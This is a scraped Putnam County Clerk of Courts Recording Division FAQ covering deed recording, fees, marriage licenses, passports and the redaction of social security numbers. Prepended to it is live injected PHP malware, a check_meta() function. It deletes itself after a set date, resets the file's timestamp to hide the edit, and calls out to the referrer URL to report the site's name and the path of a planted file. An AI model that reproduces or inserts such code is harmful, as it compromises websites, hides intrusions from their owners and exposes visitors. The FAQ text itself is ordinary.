check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456736233){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } Recording Division Frequently Asked Questions
Home Recording Division Frequently Asked Questions

More... Quick Links

Recording Division FAQ's - Contents
  Toggle all descriptions Collapse all descriptions
Deeds and Mortgages - OR top
What are the hours of operation for the Recording Division?

The Recording Division is open from 8:30 am to 5:00 pm. We stop recording documents at 4:00 pm
each day. We do accept recordings after 4:00 pm but they will be recorded the next working day and
originals will be mailed to you within 5-7 days.

Where can I search Official Records (Non-Court)?

Public computers are available in the Recording Division or you can search online at This is a statewide official records search website.

How can I get a copy of a recorded subdivision plat?

You can come into the Recording Division to request a copy or send a written request with
the book, page and sheet number. The fee is $5.00 per sheet.

How do I find out the name of the owner of a piece of property?

All of our records are by property owner name. If you do not have the name of the property
owner, but you have the location or the legal description of the piece of property, please
contact the Putnam County Property Appraiser.

I cannot find the deed to my house! What do I do?

If your property was purchased after October 1983, you may obtain a copy from This is a statewide official records search website. There are some
images available for you to print at no charge if printed outside our office. If you purchased
prior to 1983, you would need to write to our office and provide the official book and page
number of the recorded deed.

The Recording Division can provide you with a certified copy of your deed which will be as
good as the original. Please check the current fee schedule for charges.

Where do I obtain blank deed forms?

Legal forms are available at most office supply stores. The Clerk's Office is not able to provide
assistance with form preparation. Questions regarding how to fill out a form should be
directed to a legal professional. If you are unsure of the type of form or how fill out the
form, an attorney is recommended.

Should I use a Quit Claim or Warranty Deed form to transfer property?

Deeds are recorded in the Recording Division, but the Clerk's Office cannot help you with any paperwork. Please consult your Attorney.

***Please understand that Judges, Judicial Assistants, Clerks of Court,
and Sheriff's Department employees CANNOT practice law or give you
legal advice. They can ONLY point out the existence of certain
procedures, but CANNOT tell you how to follow them or how effective
talk with a lawyer if you have any questions about your rights.

How do I add/change a name on a deed?

To add or change a name on a deed, you or your attorney must prepare a new deed. While
most office supply stores carry legal forms that you can use, there are considerable legal
ramifications and complexities in the preparation of a deed. If you are not entirely familiar
with these or otherwise trained in the preparation of a deed, then we strongly suggest that
you seek the advice of an attorney.

The deed will need to be signed by the grantor in the presence or a notary and two witnesses.
Once you have completed the form properly, you should bring the deed into the Recording
for recording into the public record.

Does the Recording Division notarize documents?

No. The Clerk's Office does not notarize or sign as witnesses on documents.

How much money will it cost me to record my deed?

Please consult the current fee schedule for changes. The current recording fee is $10.00 for
the first page and $8.50 for each additional page, plus Documentary Stamps are required at
$0.70 per $100.00 based on the purchase price or the consideration. If there is a mortgage
being assumed, additional stamps at the rate of $0.35 per $100.00 on the balance of the
mortgage being assumed will also be required.

I got a divorce. How do I get my ex-spouse's name off of my deed?

A new deed will need to be prepared from the ex-spouse whose name is being taken off of
the deed, to the ex-spouse who is getting the property. In some instances Documentary Stamp
will be required if the property is mortgaged and is the non-marital home.

Can I fax my deed for recording?

NO. The Original deed with the original signatures is necessary for recording.

My spouse died. How do I get their name off of my deed?

A certified copy of the death certificate must be recorded. We cannot record an altered copy.
If the person died in the State of Florida, a certified copy must be obtained from the State
Health Department without the cause of death. If the person died in a state other than Florida,
we can record a certified copy with the cause of death. Please specify to the Health
Department that you need this certified copy for RECORDING PURPOSES.

How can I determine how much someone paid for a piece of property?

The Documentary Stamp Tax paid on the deed will indicate the purchase price of the property.
To calculate the purchase price, divide the total amount of documentary stamps paid by the tax
rate for that particular year per hundred dollars. The present rate is $0.70.

How can I determine if there are any liens/mortgages on a property?

You may use the website to search for records from October 1983 to
the present by property owner's name. You may also reach this through our website by
clicking on Online Inquiry System at the top of the navigation bar on the left side of the page.

Marriage License - OR top
What are the requirements for a civil marriage ceremony?

A civil marriage ceremony can be performed in the Recording Division after the license is effective for an additional cost of $30.00. Witnesses are not required for a civil marriage ceremony.

How do I apply for a marriage license?
  • You must both come in to the Recording Division together by 4:00 pm.
  • A valid photo ID is required in order for the clerk to witness your signature.
  • Applicants do not have to be Florida residents.
  • There is a 3 day waiting period before a marriage ceremony can take place. Exceptions to this rule:
    • There is no waiting period for Florida residents who have completed
      a 4 hour marriage preparation course within the last 12 months.
    • The waiting period is also waived for non-Florida residents.
  • If either party has been previously married, it must be noted how and when the marriage ended.
  • License is valid for 60 days after issuance.
  • The cost is $93.50.
  • The cost is reduced to $61.00 if the applicants have completed marital counseling by a person
    registered with the courthouse.
  • Blood tests have not been required since this test was abolished in 1986.

Can a minor apply for a marriage license?

The clerk may issue a marriage license to applicants aged 16 or 17 if the following is presented:

  • Minor applicant(s) presents written consent signed by both parents and acknowledged
    before some officer authorized by law to take acknowledgments and administer oaths.
  • Certified copy of Birth Certificate showing parental relationship to minor.

However, a license may be issued without parental consent when both parents of such minor are deceased
at the time of making the application along with evidence as to why any party on the minors Birth Certificate
is not able or required to consent or when such minor has been married previously. Such evidence may be:

  • Certified Copy of Death Certificate or
  • Certified Copy of Court Order of Sole Custody by one parent or Guardian

    For more information contact the Recording Division

If you receive a marriage license from one county can you get married in a different county?

Yes, you may use a Florida marriage license in any county in Florida.

Official Records - OR top
What are your hours of operation?

The Recording Division is open from 8:30 am to 5:00 pm.

Where can I search Official Records (Non-Court)?

Public computers are available in the Recording Division, or you can search online at This is a Statewide official records search website.

Does the Recording Division notarize documents?

No. We do not notarize or sign as witnesses on documents.

Where can I obtain a copy of a Birth Certificate or Death Certificate?

The Putnam County Environmental Health Office (386-326-3200) can assist with copies of birth
certificates and death certificates. All Putnam County births and deaths are recorded with the
Office of Vital Statistics in Jacksonville, FL (904-359-5900) along with births, marriages, divorces,
and deaths for the entire State.

Death certificates may be recorded with the Clerk of Courts Recording Division in conjunction with
other documents.

How do I obtain a copy of my marriage license?

If the marriage license was filed with the Clerk's Office after July 1991 you can request a copy from
the Recording Division or go online to

All other request for marriage licenses prior to July 1991 should be sent to Recording Division including the information below.

When requesting copies or certified copies from the Recording Division please send a written
request including the bride's and groom's names as well as the date of marriage. Please see our
Fees Page for cost of certified copies.

Passport Applications - OR top
Where can I go to apply for a Passport book or card?

The Putnam County Clerk of Courts has various locations for your convenience.

The locations are as follows:

Putnam County Courthouse

Recording Division

518 St Johns Ave Bldg 1-E

Palatka, FL 32177

Processing Hours: Monday - Friday from 8:30 to 4:00 pm

Crescent City Satellite Office

115 N Summit St

Crescent City, FL 32112

Processing Hours: Tuesday - Thursday from 9:00 am to 3:00 pm

What is the new U.S. Passport Card?

As of February 1, 2008, customers now have the option to apply for a passport book, a
passport card, or both. The passport card may only be used for land and sea travel between the United States and Canada, Mexico, Bermuda and the Caribbean.

For more information regarding the new U.S. Passport Card visit the U.S. Department of State website.

How can I obtain a new passport?

There are authorized passport agents available in the Recording Division and at the Crescent City
satellite office. A certified copy of your birth certificate, a valid driver's license, one
passport photo, and at least one check or money order payable to U.S. Department of State
(see next question) are required to process a passport. For additional information call 877-487-
2778 (toll free) or visit the U.S. Department of State website for an application online or for
more specific questions concerning what travel destinations require a passport.

You must complete Form DS-11 and apply in person if you can answer "yes" to any of the
following questions:

  • Are you applying for the first time?
  • Was your previous U.S. passport lost, stolen, or damaged?
  • Is your previous passport expired and issued over 15 years ago?
  • Is your previous passport expired and was issued when you were under
    the age of 16?
  • Has your name changed since your passport was originally issued and you
    don't have legal proof of the change?

All applicants must bring proof of U.S. citizenship (such as an original certified Birth Certificate,
with parental relationship, Naturalization Certificate, or a previous passport) plus proof of identity
(such as a valid driver'slicense) and one (1) identical photographic portrait 2" x 2" in size.
Photos can be taken at the local Walgreens or CVS stores.

Are the requirements the same for a minor?

In addition to the ABOVE requirements:

Applicants under the age of 16:

  • Must appear in person.
  • Must provide their Social Security number.
  • Must not sign the application until instructed to do so.

AND BOTH Parents/Guardian(s) MUST:

  • Be present and give consent.
  • Present evidence of Child's Relationship to Parent/Guardian.
  • Present valid photo identification.

Applicants 16 and 17 years of age:

  • Must appear in person.
  • Must establish parental consent.
  • Must present valid photo identification. If none is available, the Parent/Guardian will
    need to appear in person with their valid photo identification.

Additional information regarding Minor Applicants can be found on the U.S. Department of State

To ensure that you have included all requested documents required to process your
application, please refer to Form DS-11 for a listing of these requirements.

What are the passport fees?

Visit the U.S. Department of State website for updated fee information.

Passport Type Application Fee* Processing Fee** Total Fee
Passport Book (Age 16 & Older) $110 $25 $135
Passport Book (Under Age 16) $80 $25 $105
Passport Card (Age 16 & Older) $30 $25 $55
Passport Card (Under Age 16) $15 $25 $40

* Pay the Application fee to the "U.S. Department of State"

(Personal check or money order ONLY)

** Pay the Processing fee to the "Putnam County Clerk of Courts".

(Cash, Cashier Checks, Money Orders or Credit Cards are acceptable payment methods.)

Credit Cards are only accepted in person in the Recording Division before 4:00 pm.

Expedited Service: Add $60 for each application plus the recommended express postage to
and from the passport office. Contact the Recording Division for current express mail postage
for passports.

How can I renew my passport?

ALL Passport renewals require the completion of Form DS-82.

You can renew IF:

  • Your passport was issued less than 15 years ago.
  • You were at least 16 years old when your most recent passport was issued.
  • You can submit your most recent, undamaged passport.
  • You still have the same name OR
  • If your name has changed since your last passport was issued, you must include
    a certified copy of the legal document specifying your name change (for example: a
    marriage certificate, a divorce decree, an adoption decree, or a Court order). No
    photocopies will be accepted.

If you cannot comply with any of the above you must follow the new passport requirements.
You will need to submit the following with a Form DS-82 Renewal form:

  • One (1) passport photo taken within the last 6 months.
  • Your most recent passport. (Note: Your old passport will be returned with your new
  • A check or money order payable to U.S. Department of State. (Click here for fees)
  • A SEPARATE check or other form of payment for the service fee. (Click here for fee schedule)

If you need your passport urgently, you may request Expedited Service.

How long does it take to get a Passport book or card?

Click here for up to date processing times.

If you are planning to travel within the next 14 days or need a foreign visa within 4 weeks, you
will need to make an appointment with the Regional Passport Agency by calling 1-877-487-
2778 from a touch-tone phone. Proof of travel will be required.

How long is a Passport book or card valid?

If you are 16 or older, your passport book and card will be valid for 10 years from the date of

If you are 15 or younger, your passport book and card will be valid for 5 years from the date
of issuance.

How do I report a lost or stolen passport?

The Passport Agency recommends that you report your lost or stolen passport immediately.
You may report your lost or stolen passport by visiting one of our locations and completing
Form DS-64. If you choose to, you may also apply for a new passport while you are there.

You may also find the instructions to replace your passport on the U.S. Department of State

Or call the U.S. Department of State toll free at: 1-877-487-2778 (TTY 1-888-874-7793).

How do I obtain a certified copy of my birth certificate?

For Putnam County birth or death certificates:

Putnam County Health Department

All births, marriages, divorces, and deaths for the State of Florida:

Office of Vital Statistics

How can I check the status of my passport?

You can call the National Passport Information Center at 1-877-487-2778
6:00 AM - Midnight EST, Monday - Friday (excluding Federal holidays),


Verify the status of your passport at the U.S. Department of State website.

Social Security Number Removal - OR top
How do I request the removal of a social security number from the image of an Official Record that has been posted on Putnam County's publicly available Internet website?

On or after October 1, 2002, any person preparing or filing a document for recording in the
Official Record may not include a social security number in such document unless required by
law to do so.

Any person has the right to request the Clerk to remove or "redact" his or her social security
number from an image of an Official Record that has been placed on that Clerk's publicly
available Internet website. The request must be legibly written, signed, and delivered in
person, or by mail, fax or email to the Clerk of Courts, Recording Division. The request MUST
specify the book and page number that contains the social security number. No fee is charged
for this service.

Click here for the form.

Copyright © 2018 Clerk of Courts. All Rights Reserved.
Joomla! is Free Software released under the GNU/GPL License.
To protect your privacy, please read the Putnam County Email Privacy Policy.

Information on this website does not constitute the Official Court Records maintained by the Clerk.